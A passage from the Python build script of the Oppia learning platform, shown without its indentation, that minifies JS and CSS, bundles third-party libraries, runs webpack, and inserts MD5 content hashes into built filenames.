# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to
ensure exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError: One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError: The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
THIRD_PARTY_JS_FILEPATH, MINIFIED_THIRD_PARTY_JS_FILEPATH)
_minify(THIRD_PARTY_CSS_FILEPATH, MINIFIED_THIRD_PARTY_CSS_FILEPATH)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(THIRD_PARTY_JS_FILEPATH)
safe_delete_file(THIRD_PARTY_CSS_FILEPATH)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
WEBFONTS_DIR = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(THIRD_PARTY_JS_FILEPATH)
with python_utils.open_file(
THIRD_PARTY_JS_FILEPATH, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(THIRD_PARTY_CSS_FILEPATH)
with python_utils.open_file(
THIRD_PARTY_CSS_FILEPATH, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(WEBFONTS_DIR)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], WEBFONTS_DIR))
def build_using_webpack():
"""Execute webpack build process. This takes all TypeScript files we have in
/templates/dev/head and generates JS bundles according the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
The settings for this are specified in webpack.prod.config.ts.
"""
python_utils.PRINT('Building webpack')
cmd = '%s %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, WEBPACK_PROD_CONFIG)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespaces, interpolates paths in HTML to include
hashes in source directory and save edited file at target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted file' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
FILE_EXTENSIONS_NOT_TO_TRACK = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_NOT_TO_TRACK):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError: The hash dict is empty.
ValueError: Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError: The filename does not contain hash.
KeyError: The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# head/pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belongs to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
HASH_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for HASH_DIR in HASH_DIRS:
hashes.update(get_file_hashes(HASH_DIR))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
COPY_INPUT_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
COPY_OUTPUT_DIRS = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(COPY_INPUT_DIRS) == len(COPY_OUTPUT_DIRS)
for i in python_utils.RANGE(len(COPY_INPUT_DIRS)):
safe_delete_directory_tree(COPY_OUTPUT_DIRS[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
COPY_INPUT_DIRS[i], COPY_OUTPUT_DIRS[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(COPY_OUTPUT_DIRS, hashes)
SOURCE_DIRS_FOR_ASSETS = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
OUTPUT_DIRS_FOR_ASSETS = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(SOURCE_DIRS_FOR_ASSETS, OUTPUT_DIRS_FOR_ASSETS)
SOURCE_DIRS_FOR_THIRD_PARTY = [THIRD_PARTY_GENERATED_DEV_DIR]
OUTPUT_DIRS_FOR_THIRD_PARTY = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
SOURCE_DIRS_FOR_THIRD_PARTY, OUTPUT_DIRS_FOR_THIRD_PARTY)
SOURCE_DIRS_FOR_WEBPACK = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
